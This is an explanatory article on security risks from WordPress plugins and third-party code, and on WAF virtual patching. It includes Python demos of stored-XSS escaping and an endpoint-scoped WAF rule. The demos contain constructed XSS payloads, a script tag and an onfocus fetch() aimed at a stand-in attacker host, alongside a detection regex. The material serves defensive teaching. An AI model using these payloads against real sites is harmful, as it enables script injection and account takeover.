Cybersecurity is a “top of mind” concern for many organizations. In recent years, a steady stream of data breaches and the introduction of new data privacy laws, such as the European Union’s General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA), have underscored the potential impact of poor cybersecurity. In some cases, a single data breach has driven a company out of business.
While most companies are working to reduce their cyber risk, identifying and remediating all potential risk sources can be difficult or impossible. Additionally, many organizations focus on “internal” risks at the expense of third-party risk.
The benefits of Content Management Systems (CMSs), such as WordPress, have driven widespread adoption. However, these platforms can also be a source of cyber risk to an organization. In order to mitigate these risks, companies must take proactive steps to secure their web presence, such as deploying a web application firewall (WAF).
The Appeal of Content Management Systems
The appeal of a CMS is not limited to the ability to stand up a website quickly and easily. Tools like WordPress also offer a large catalog of plugins that add functionality to a site with little effort. These make it possible to rapidly build a fully functional website that serves a complex purpose, such as an e-commerce store. Such a site must handle shopping carts and payment card data securely, which is challenging to implement correctly from scratch. With WordPress, an e-commerce site can be assembled from existing plugins to an organization’s exact specifications, though the security of the result then depends on the quality of each plugin chosen.
CMSs Introduce Security Vulnerabilities
CMSs like WordPress, through their base functionality and available plugins, offer many advantages to an organization. However, these same features can also introduce potential security risks and vulnerabilities.
WordPress offers a wide range of third-party plugins. Because these plugins are not written by the WordPress core team, they often receive far less security review than, at least in theory, is applied to the platform’s own code. The result of this limited oversight is visible in the sheer number of vulnerabilities discovered in WordPress plugins and exploited by attackers.
Between April 28 and May 5, 2020, a hacking group attempted to compromise over 900,000 WordPress sites using cross-site scripting (XSS) attacks. The injected JavaScript ran in the browser of anyone who visited an affected page; when that visitor was a logged-in administrator, the script used the admin’s authenticated session to create a backdoor, giving the attackers persistent access to the site.
Potentially more concerning than the attack itself was the number of different vulnerabilities it tried to use. The attackers attempted to exploit XSS vulnerabilities in at least five different WordPress plugins. Although patches for these vulnerabilities had been available for some time, there is no guarantee that every site owner applied them, and an unpatched install remains exploitable indefinitely. The attackers are also likely sophisticated enough to swap in newer vulnerabilities, which are even less likely to have been patched.
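The campaign above relied on the ordinary mechanics of stored XSS: an attacker-controlled value is written into a plugin setting and later echoed into a page without encoding. The following Python example is added here to show that mechanism and its fix; it is not WordPress or plugin code, and the setting values it uses are constructed, not payloads from the campaign. It renders an untrusted value in two contexts (element text and an attribute value), once unescaped and once HTML-encoded, then uses a real HTML parser to report what a browser would actually execute.

```python
import html
from html.parser import HTMLParser
from typing import List

# Constructed sample values, not payloads from the 2020 campaign. A plugin
# setting that an unauthenticated request could overwrite is the class of bug
# the campaign abused; the attacker-controlled value then lands in a page.
BENIGN_SETTING = "Summer sale & new arrivals"
SCRIPT_SETTING = '<script src="https://attacker.invalid/x.js"></script>'
ATTR_BREAKOUT = '" autofocus onfocus="fetch(\'https://attacker.invalid\')'


def render_banner_vulnerable(value: str) -> str:
    """Echoes a stored option into page text without encoding it."""
    return f'<div class="plugin-banner">{value}</div>'


def render_banner_hardened(value: str) -> str:
    """Same output, but the untrusted value is HTML-encoded first."""
    return f'<div class="plugin-banner">{html.escape(value, quote=True)}</div>'


def render_input_vulnerable(value: str) -> str:
    """Echoes a stored option into an attribute value without encoding it."""
    return f'<input name="title" value="{value}">'


def render_input_hardened(value: str) -> str:
    """Attribute context: quote=True also encodes the quote characters that
    would otherwise close the attribute and let the value start a new one."""
    return f'<input name="title" value="{html.escape(value, quote=True)}">'


class ExecutableSink(HTMLParser):
    """Records what a browser would execute: <script> elements and on* handlers.
    Parsing the markup, rather than regex-matching it, avoids false positives on
    text that merely contains the characters 'onfocus=' inside an encoded value."""

    def __init__(self) -> None:
        super().__init__()
        self.found: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.found.append("script")
        for name, _ in attrs:
            if name.startswith("on"):
                self.found.append(name)


def executable_parts(markup: str) -> List[str]:
    """Return the executable constructs a browser would find in the markup."""
    sink = ExecutableSink()
    sink.feed(markup)
    sink.close()
    return sink.found


if __name__ == "__main__":
    for label, render, value in [
        ("banner/vulnerable", render_banner_vulnerable, SCRIPT_SETTING),
        ("banner/hardened", render_banner_hardened, SCRIPT_SETTING),
        ("input/vulnerable", render_input_vulnerable, ATTR_BREAKOUT),
        ("input/hardened", render_input_hardened, ATTR_BREAKOUT),
    ]:
        print(f"{label:18} executes: {executable_parts(render(value)) or 'nothing'}")
```

The attribute case is the one plugin authors most often miss: encoding `<` and `>` alone does not help when the value sits inside `value="..."`, because a bare `"` ends the attribute and everything after it becomes new attributes, including an event handler. Encoding for the exact output context (here, `html.escape` with `quote=True`) is the fix; a WordPress plugin would use the platform’s own escaping helpers for the same purpose.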
The Challenges of Third-Party Risk Management
The vulnerabilities in the WordPress platform and in the third-party plugins that many sites use pose a serious security issue for many companies. However, they represent only a fraction of the third-party risk that threatens an organization’s web infrastructure.
Many applications also incorporate third-party libraries and copied code during development. Question-and-answer sites like Stack Overflow are a common source of snippets that developers paste into their own projects, and sites such as GitHub provide complete libraries and code samples that programmers download or copy as well.
While code reuse can improve both the quality and the security of an application, it can also introduce vulnerabilities when done carelessly. Vulnerabilities inherited from third-party libraries and copied code can be hard to detect with application security tooling, assuming developers run such testing at all. As a result, this external code leaves an organization exposed to data breaches and other expensive and damaging security incidents.
Managing Third-Party Web Vulnerabilities
For most organizations, manual vulnerability management is difficult or impossible. Each year, over twenty thousand new vulnerabilities are publicly disclosed in production software, on top of previously disclosed vulnerabilities in programs still in active use.
The use of a CMS such as WordPress, together with third-party code in imported libraries and copied samples, makes vulnerability management more complex. If an organization lacks complete visibility into the code its applications use, it is easy to overlook a critical vulnerability, and the patch for it, in that code. Rather than trying to identify and patch each vulnerability by hand, organizations need a more scalable way to manage vulnerabilities in their code. Deploying a WAF provides one.
A robust WAF offers “virtual patching”: it blocks requests to an application that match the known exploit pattern for a given vulnerability. A WAF’s rule set can be updated far more quickly than a vulnerable application can be patched, so it can shield a known vulnerability, whether in third-party or first-party code, while the real fix is tested and deployed. Virtual patching is a stopgap rather than a replacement for patching: a rule only covers exploit patterns that are known and written into it, so the underlying vulnerability should still be fixed.
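To make the virtual patching idea concrete, here is an added Python example of the request-filtering logic a WAF rule implements; it is not code from any WAF product, and the plugin, AJAX action and parameter names in it are hypothetical. A rule is scoped to one vulnerable endpoint and one parameter, the parameter value is normalized before matching so that double-URL-encoded or entity-encoded exploit attempts are still caught, and constructed sample requests show what is blocked and what passes.

```python
import html
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit


@dataclass
class Request:
    method: str
    url: str
    body: Dict[str, str] = field(default_factory=dict)


@dataclass
class VirtualPatch:
    """One rule: the endpoint a known bug lives on, the parameter it is reached
    through, and what an exploit attempt looks like in that parameter."""
    name: str
    path_prefix: str
    parameter: str
    pattern: re.Pattern


# The plugin, action and parameter names below are hypothetical, chosen for
# illustration; they do not refer to a real WordPress plugin or advisory.
RULES: List[VirtualPatch] = [
    VirtualPatch(
        name="example-slider: stored XSS through the 'title' setting (hypothetical)",
        path_prefix="/wp-admin/admin-ajax.php",
        parameter="title",
        pattern=re.compile(r"<\s*script\b|\bon\w+\s*=|javascript\s*:", re.IGNORECASE),
    ),
]


def normalize(value: str) -> str:
    """Undo the encodings an attacker layers on to slip past a naive string match:
    percent-decode twice (double URL encoding) and decode HTML entities."""
    for _ in range(2):
        value = unquote(value)
    return html.unescape(value)


def parameters(req: Request) -> Dict[str, List[str]]:
    """Merge query-string and form-body parameters into one view."""
    merged = parse_qs(urlsplit(req.url).query, keep_blank_values=True)
    for key, value in req.body.items():
        merged.setdefault(key, []).append(value)
    return merged


def matching_rule(req: Request) -> Optional[VirtualPatch]:
    """Return the first rule whose endpoint and exploit pattern the request matches."""
    path = urlsplit(req.url).path
    values = parameters(req)
    for rule in RULES:
        if not path.startswith(rule.path_prefix):
            continue
        for raw in values.get(rule.parameter, []):
            if rule.pattern.search(normalize(raw)):
                return rule
    return None


def decide(req: Request) -> str:
    return "block" if matching_rule(req) else "allow"


# Constructed sample traffic (not captured from any real site).
SAMPLE_REQUESTS = [
    Request("GET", "/wp-admin/admin-ajax.php?action=example_slider_save&title=Summer%20sale"),
    Request("POST", "/wp-admin/admin-ajax.php",
            {"action": "example_slider_save",
             "title": '<script src="https://attacker.invalid/x.js"></script>'}),
    # Double-URL-encoded "<script>": parse_qs decodes one layer, normalize() the rest.
    Request("GET", "/wp-admin/admin-ajax.php?action=example_slider_save&title=%253Cscript%253E"),
    # Same payload shape on an endpoint no rule covers: a virtual patch is not a
    # general XSS filter, it only shields the vulnerability it was written for.
    Request("GET", "/?s=%3Cscript%3Ealert(1)%3C%2Fscript%3E"),
]


def run_samples() -> List[str]:
    return [decide(r) for r in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for req, verdict in zip(SAMPLE_REQUESTS, run_samples()):
        print(f"{verdict:5} {req.method} {req.url} {req.body or ''}")
```

Two points carry over to production rules. First, normalize before matching: the third sample is blocked only because the value is percent-decoded a second time, and a rule that matched the raw parameter would let it through. Second, note that the fourth sample passes even though it carries the same kind of payload, because the rule is deliberately scoped to the vulnerable endpoint; that scoping keeps false positives low, but it also means a virtual patch protects exactly one known bug and nothing else.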